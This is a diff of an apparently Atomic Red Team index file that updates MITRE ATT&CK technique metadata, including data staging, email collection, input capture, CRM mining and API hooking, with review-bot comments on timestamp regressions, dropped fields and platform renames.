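Review bot: replacing `Office 365` and `Google Workspace` with `Office Suite` in T1114.003's platform list means anything that selects techniques by those legacy platform strings (per-platform indexes, filters) will no longer match this technique; confirm the index generation handles the new name so the `Office365 - Email Forwarding` test does not silently drop out of platform views. The added `Cloud Service: Cloud Service Metadata` data source and `x_mitre_version: '1.4'` bump look consistent with the same change made to T1530.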
@@ -83663,9 +84219,6 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.003
atomic_tests:
- name: Office365 - Email Forwarding
@@ -83718,63 +84271,62 @@ collection:
elevation_required: false
T1074:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Shane Tully, @securitygypsy
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
- created: '2017-05-31T21:30:58.938Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1074
- url: https://attack.mitre.org/techniques/T1074
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: PWC Cloud Hopper April 2017
- url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
- description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
- April 5, 2017.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Data Staged
description: |-
Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Data Staged
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ - Shane Tully, @securitygypsy
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'File: File Access'
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+ created: '2017-05-31T21:30:58.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074
+ external_id: T1074
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: PWC Cloud Hopper April 2017
+ description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+ April 5, 2017.
+ url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.002:
technique:
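Review bot: despite the size of this hunk, the T1074 field set is preserved: platforms, domains, contributors, object_marking_refs, type, id, created, created_by_ref, version, all three external references, deprecated, revoked, name, description, detection, kill_chain_phases, is_subtechnique, data_sources, attack_spec_version and modified_by_ref all reappear; the only removal is `spec_version: '2.1'`, consistent with the rest of the patch. Substantive changes are the `modified` timestamp, `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, and the Mandiant URL moving to the mandiant.com PDF, matching the same edit in T1074.002.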
@@ -83847,7 +84399,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -83946,7 +84497,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1039
atomic_tests:
- name: Copy a sensitive File over Administrative share with copy
@@ -84047,7 +84597,7 @@ collection:
elevation_required: true
T1114.002:
technique:
- modified: '2023-05-31T12:34:03.420Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Email Collection: Remote Email Collection'
description: Adversaries may target an Exchange server, Office 365, or Google
Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -84059,6 +84609,9 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
locations, especially for privileged accounts (ex: Exchange administrator
@@ -84066,11 +84619,11 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- Windows
- - Google Workspace
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -84087,9 +84640,6 @@ collection:
external_id: T1114.002
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1114.002
atomic_tests:
- name: Office365 - Remote Mail Collected
@@ -84184,7 +84734,7 @@ collection:
elevation_required: false
T1056:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-08-13T17:33:45.244Z'
name: Input Capture
description: Adversaries may use methods of capturing user input to obtain credentials
or collect information. During normal system usage, users often provide credentials
@@ -84200,6 +84750,7 @@ collection:
phase_name: credential-access
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection may vary depending on how input is captured but
may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
`GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -84208,13 +84759,13 @@ collection:
keylogging or API hooking are present.'
x_mitre_domains:
- enterprise-attack
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -84222,15 +84773,11 @@ collection:
- 'Process: Process Metadata'
- 'Process: OS API Execution'
- 'Driver: Driver Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
type: attack-pattern
id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
created: '2017-05-31T21:30:48.323Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056
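Review bot: Dropping x_mitre_permissions_required from T1056 at L218525-L218529 leaves the field present on techniques that were not refreshed the same way; T1602.001 still carries `x_mitre_permissions_required: - Administrator` at L218789-L218790. Anything that reads this field now sees it for only a subset of techniques, so either remove it consistently or state in the commit message that the field is being phased out as techniques are refreshed. The `revoked: false` added at L218534 matches the other refreshed entries.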
@@ -84241,9 +84788,60 @@ collection:
url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1213.004:
+ technique:
+ modified: '2024-10-17T14:36:24.983Z'
+ name: Customer Relationship Management Software
+ description: |-
+ Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+ Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+ CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Centre for Cybersecurity Belgium (CCB)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Logon Session: Logon Session Creation'
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+ created: '2024-07-01T20:06:13.664Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/004
+ external_id: T1213.004
+ - source_name: Bleeping Computer Bank Hack 2020
+ description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+ 100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+ - source_name: Bleeping Computer Mint Mobile Hack 2021
+ description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+ after numbers ported, data accessed. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+ - source_name: Bleeping Computer US Cellular Hack 2022
+ description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+ after billing system hack. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1557.002:
technique:
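Review bot: The new T1213.004 entry at L218548-L218598 ends on the unchanged `atomic_tests: []` at L218599, which previously closed T1056; T1056 is now closed by the added `atomic_tests: []` at L218547 instead. The rendered diff shows no indentation, so check the real file that L218547 sits at technique level and that T1213.004 is not nested under T1056. Also note that the new sub-technique ships with `x_mitre_detection: ''` and no atomic tests, which is worth a line in the commit message.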
@@ -84289,7 +84887,7 @@ collection:
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-22T18:37:22.176Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: ARP Cache Poisoning
x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
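Review bot: The `modified` timestamp for T1557.002 moves backward at L218605-L218606 (2022-11-08 to 2022-07-22), and T1602.001 does the same at L218782-L218783 (2021-04-29 to 2020-10-22). A refresh from a newer upstream bundle should not normally produce an older modification time, so confirm that the source bundle used here is newer than the one behind the previous file; if upstream itself rewrote these values, say so in the commit message so the regression is not mistaken for a stale import.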
@@ -84308,37 +84906,36 @@ collection:
- 'Network Traffic: Network Traffic Flow'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.003:
technique:
- modified: '2022-10-18T22:44:01.723Z'
+ modified: '2024-09-04T13:03:54.101Z'
name: Code Repositories
description: |-
Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
- Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+ Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Toby Kohlenberg
+ - Josh Liburdi, @jshlbrd
+ x_mitre_deprecated: false
x_mitre_detection: Monitor access to code repositories, especially performed
by privileged users such as Active Directory Domain or Enterprise Administrators
as these types of accounts should generally not be used to access code repositories.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user-based anomalies.
- x_mitre_platforms:
- - SaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Toby Kohlenberg
- - Josh Liburdi, @jshlbrd
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
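Review bot: Most of this hunk is key reordering rather than content: x_mitre_contributors moves from L218646-L218649 to L218629-L218632, and x_mitre_platforms, x_mitre_is_subtechnique and x_mitre_deprecated move from L218639-L218642 to L218650-L218652 and L218633 with unchanged values. The only substantive edits are the description at L218624, where the credentials phrase now links to Unsecured Credentials (T1552), and the version bump to 1.2 at L218653. If the generator now emits keys in upstream STIX order, state that in the commit message so reviewers can skip the moved blocks.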
@@ -84361,41 +84958,52 @@ collection:
url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213:
technique:
- modified: '2024-03-01T16:27:47.391Z'
+ modified: '2024-10-28T19:10:16.960Z'
name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
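Review bot: The rewritten T1213 description at L218689-L218712 introduces three new citations (Mitiga, TrendMicro Exposed Redis 2020, Cybernews Reuters Leak 2022), and matching external_references entries are added at L218745-L218749, L218754-L218758 and L218766-L218769, so no citation dangles. Two things to be aware of: the description literal now carries trailing spaces before line breaks (`(PII) \n\n` at L218701, `databases \n*` at L218705, and the `Teams` / `\n\nIn` fold at L218706-L218707), which is upstream text and should stay as emitted rather than be hand-trimmed; and the single contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` at L218717 becomes two separate contributors at L218723-L218724, which is a data change, not a reorder.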
@@ -84424,10 +85032,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -84440,10 +85047,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -84452,11 +85069,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
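Review bot: The Cybernews reference description at L218767 has a stray space before the period in `Vilius Petkauskas .`; if this file is generated from the upstream STIX bundle the value should be left as-is and corrected upstream, otherwise trim it here. Removing `spec_version: '2.1'` at L218774 follows the pattern applied to every other technique in this change.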
@@ -84493,7 +85113,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
@@ -84525,80 +85145,10 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
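Review bot: T1602.001 loses `x_mitre_attack_spec_version: 2.1.0` at L218792 with no replacement: nothing in this hunk adds one, the only other T1602.001 hunk (L218778-L218786) changes only `modified`, and there is no hunk between them. Compare T1557.002, which keeps `x_mitre_attack_spec_version: 2.1.0` at L218612 while only `spec_version` is removed. Either re-emit the value for T1602.001 or explain why this technique alone should carry none. The 60 removed T1056.004 lines at L218796-L218864 are metadata and reference blocks that reappear later in the same entry (L218894-L218960), not deletions.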
@@ -84611,23 +85161,89 @@ collection:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
